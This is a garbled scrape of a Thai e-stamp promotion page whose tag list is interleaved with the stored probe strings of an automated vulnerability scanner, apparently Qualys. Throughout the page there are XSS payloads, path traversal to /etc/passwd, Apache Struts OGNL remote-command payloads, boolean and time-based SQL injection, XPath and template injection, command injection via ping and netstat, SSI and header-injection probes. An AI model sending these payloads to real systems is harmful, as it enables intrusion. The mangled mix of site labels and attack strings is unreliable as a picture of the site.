Ads express_promotion express_estamp Express_E-stamp keymessage express_campigne howtogetestamp SXGP_E-stamp extrastamp_r8 E-Stamp_Promotion e-stamp_promtion stamp_promotion extra_stamp collection2 extra_stamp_launch_tvc15s extra_stamp_salehere " class="scroll-links">"> z--> " class="scroll-links">"'> [removed] " class="scroll-links">[removed]" SRC=//localhost/j> <[removed]qss=7;//<[removed]" class="scroll-links">"'><[removed]qss=7;//<[removed] <META HTTP-EQUIV="refresh" C> <STYLE type="text/css" a=3>BODY{background:url("[removed]qss=7")}</STYLE> <EMBED SRC=//localhost/q.swf AllowScriptAccess=always></EMBED> " class="scroll-links">"'> ' onEvent=X150750924Y4Z " onEvent=X150750924Y4Z < script a=4>qss=7< /script> [removed]_q(y)[removed] <script src=http://localhost/j qss{{q=(2*2.0)}}qss q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA q Qualys_resp_hdr_injection: Vulnerable q Qualys_resp_hdr_injection: Vulnerable ;-- # /* `` , ( 1e309 /../../../../../../../etc/passwd ../../../../../../../etc/passwd //..//..//..//..//..//..//..//etc/passwd //....//....//....//....//....//....//....//etc/passwd ../../../../../../../Windows/System32/drivers/etc/hosts %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} a(){}phpinfo(); function a |netstat -an http://rfitest/ ";(function(){qxss});// ");(function(){qxss});// ';(function(){qxss});// 9;(function(){qxss});// 9 ;(function(){qxss});// '-qxss()-' */;(function(){qxss});/* "-qxss()-" |aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %> {23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}} ;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */ (23.0231*213.759) aaaa&ping; -n 92 localhost& ping -c2 -i91 localhost |ping -c2 -i91 localhost |ping -c2 -i91 localhost| " class="scroll-links">"'> ' onEvent=X159895492Y4Z " onEvent=X159895492Y4Z " class="scroll-links">"'> ' onEvent=X152955000Y4Z " onEvent=X152955000Y4Z " class="scroll-links">"> " class="scroll-links">'"--!> " class="scroll-links">'"> round2 " class="scroll-links">"'> ' onEvent=X172006160Y4Z " onEvent=X172006160Y4Z was<!--esx-->esi" class="scroll-links">qualyswas<!--esx-->esi round3 round4 stam_promotion round5 phase2_extra_stamp extra_stamp_paepro_phase2 " class="scroll-links">collection2"'> [removed]_q=random(X144331948Y4Z)[removed] collection2 [removed]_q_q=random()[removed]
" class="scroll-links">collection2">
" class="scroll-links">"'> ' onEvent=X144331948Y4Z " onEvent=X144331948Y4Z collection2' [removed]qxss(X144331948Y4Z); <!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" --> collection2') or 2634=2634 -- collection2') and 2634=1123 -- collection2') /* or klpry */oR 2634=1511 + 1123 -- aND 1124 collection2' or 3789=3789 -- collection2' and 3789=1391 -- collection2' /* or klpry */oR 3789=2398 + 1391 -- aND 1390 collection2 or 4325=4325 -- collection2 and 4325=2728 -- collection2 /* or klpry */oR 4325=1597 + 2728 -- aND 2729 collection2 or NULL IS NULL collection2 or 6248 IS NULL collection2 oR 6248=2491 + 3757 collection2 and NULL IS NULL collection2 and 7248 IS NULL collection2 aND 7248=2491 + 4757 collection2') or 'swqtp'='swqtp collection2') and 'swqtp'='ptqws collection2') /* or klpry */oR ' aND ptqws'=' aND ptqws collection2' or 'tpklq'='tpklq collection2' and 'tpklq'='xqlkp collection2' /* or klpry */oR ' aND xqlkp'=' aND xqlkp collection21 or 11=11 collection21 or 11=12 collection25 oR 9=8 + 1 collection2' or true() or 'and' = 'and collection2' and false() and 'or' = 'and collection2' or not(false()) or 'true' = 'true collection2 or true() or 'and' = 'and' collection2 and false() and 'or' = 'and' collection2 or not(false()) or 'true' = 'true' collection2" or true() or "and" = "and collection2" and false() and "or" = "and collection2" or not(false()) or "true" = "true collection2WAITFOR DELAY '00:00:29' collection2;WAITFOR DELAY '00:00:29'; collection2);WAITFOR DELAY '00:00:29'-- collection2';WAITFOR DELAY '00:00:29'-- collection2');WAITFOR DELAY '00:00:29'-- collection2',0,0);WAITFOR DELAY'00:00:29'-- collection2 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111) collection2' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ' collection2;SELECT sleep(29); -- collection2(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/ collection2(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000)) stampx2_teaser extra_stamp_wongnaibeauty_phase2 [removed]_q=random(X157307652Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X157307652Y4Z " onEvent=X157307652Y4Z [removed]qxss(X157307652Y4Z); [removed]_q=random(X141291600Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X141291600Y4Z " onEvent=X141291600Y4Z [removed]qxss(X141291600Y4Z); logos [removed]_q=random(X170296576Y4Z)[removed] " class="scroll-links">"'> ' onEvent=X170296576Y4Z " onEvent=X170296576Y4Z [removed]qxss(X170296576Y4Z); round6 [removed]alert(!)" class="scroll-links">">[removed]alert(!)
,z-->,"'>,[removed],[removed]" SRC=//localhost/j>,"'><[removed]qss=7;//<[removed],,<META HTTP-EQUIV="refresh" C>,<STYLE type="text/css" a=3>BODY{background:url("[removed]qss=7")}</STYLE>,<EMBED SRC=//localhost/q.swf AllowScriptAccess=always></EMBED>,"'>,' onEvent=X150750924Y4Z ," onEvent=X150750924Y4Z ,< script a=4>qss=7< /script>,[removed]_q(y)[removed],<script src=http://localhost/j ,qss{{q=(2*2.0)}}qss,q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA,q Qualys_resp_hdr_injection: Vulnerable,q Qualys_resp_hdr_injection: Vulnerable ,;-- ,#,/*,``,,,(,1e309,/../../../../../../../etc/passwd,../../../../../../../etc/passwd,//..//..//..//..//..//..//..//etc/passwd,//....//....//....//....//....//....//....//etc/passwd,../../../../../../../Windows/System32/drivers/etc/hosts,%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())},%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))},a(){}phpinfo(); function a,|netstat -an ,http://rfitest/,";(function(){qxss});//,");(function(){qxss});//,';(function(){qxss});//,9;(function(){qxss});//,9 ;(function(){qxss});//,'-qxss()-',*/;(function(){qxss});/*,"-qxss()-", |aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>,{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}},;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */,(23.0231*213.759),aaaa&ping; -n 92 localhost&,ping -c2 -i91 localhost,|ping -c2 -i91 localhost,|ping -c2 -i91 localhost|,"'>,' onEvent=X159895492Y4Z ," onEvent=X159895492Y4Z ,"'>,' onEvent=X152955000Y4Z ," onEvent=X152955000Y4Z ,">,'"--!>,'">,round2,"'>,' onEvent=X172006160Y4Z ," onEvent=X172006160Y4Z ,qualyswas<!--esx-->esi,round3,round4,stam_promotion,round5,phase2_extra_stamp,extra_stamp_paepro_phase2,collection2"'>,[removed]_q=random(X144331948Y4Z)[removed],collection2 [removed]_q_q=random()[removed],collection2">
,"'>,' onEvent=X144331948Y4Z ," onEvent=X144331948Y4Z ,collection2',[removed]qxss(X144331948Y4Z);,<!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" -->,collection2') or 2634=2634 -- ,collection2') and 2634=1123 -- ,collection2') /* or klpry */oR 2634=1511 + 1123 -- aND 1124,collection2' or 3789=3789 -- ,collection2' and 3789=1391 -- ,collection2' /* or klpry */oR 3789=2398 + 1391 -- aND 1390,collection2 or 4325=4325 -- ,collection2 and 4325=2728 -- ,collection2 /* or klpry */oR 4325=1597 + 2728 -- aND 2729,collection2 or NULL IS NULL ,collection2 or 6248 IS NULL ,collection2 oR 6248=2491 + 3757 ,collection2 and NULL IS NULL ,collection2 and 7248 IS NULL ,collection2 aND 7248=2491 + 4757 ,collection2') or 'swqtp'='swqtp,collection2') and 'swqtp'='ptqws,collection2') /* or klpry */oR ' aND ptqws'=' aND ptqws,collection2' or 'tpklq'='tpklq,collection2' and 'tpklq'='xqlkp,collection2' /* or klpry */oR ' aND xqlkp'=' aND xqlkp,collection21 or 11=11,collection21 or 11=12,collection25 oR 9=8 + 1,collection2' or true() or 'and' = 'and,collection2' and false() and 'or' = 'and,collection2' or not(false()) or 'true' = 'true,collection2 or true() or 'and' = 'and' ,collection2 and false() and 'or' = 'and' ,collection2 or not(false()) or 'true' = 'true' ,collection2" or true() or "and" = "and,collection2" and false() and "or" = "and,collection2" or not(false()) or "true" = "true,collection2WAITFOR DELAY '00:00:29',collection2;WAITFOR DELAY '00:00:29';,collection2);WAITFOR DELAY '00:00:29'-- ,collection2';WAITFOR DELAY '00:00:29'-- ,collection2');WAITFOR DELAY '00:00:29'-- ,collection2',0,0);WAITFOR DELAY'00:00:29'-- ,collection2 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111) ,collection2' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ',collection2;SELECT sleep(29); --,collection2(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/,collection2(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000)),stampx2_teaser,extra_stamp_wongnaibeauty_phase2,[removed]_q=random(X157307652Y4Z)[removed],"'>,' onEvent=X157307652Y4Z ," onEvent=X157307652Y4Z ,[removed]qxss(X157307652Y4Z);,[removed]_q=random(X141291600Y4Z)[removed],"'>,' onEvent=X141291600Y4Z ," onEvent=X141291600Y4Z ,[removed]qxss(X141291600Y4Z);,logos,[removed]_q=random(X170296576Y4Z)[removed],"'>,' onEvent=X170296576Y4Z ," onEvent=X170296576Y4Z ,[removed]qxss(X170296576Y4Z);,round6,">[removed]alert(!)">

คัดลอกลิงก์เรียบร้อย

script>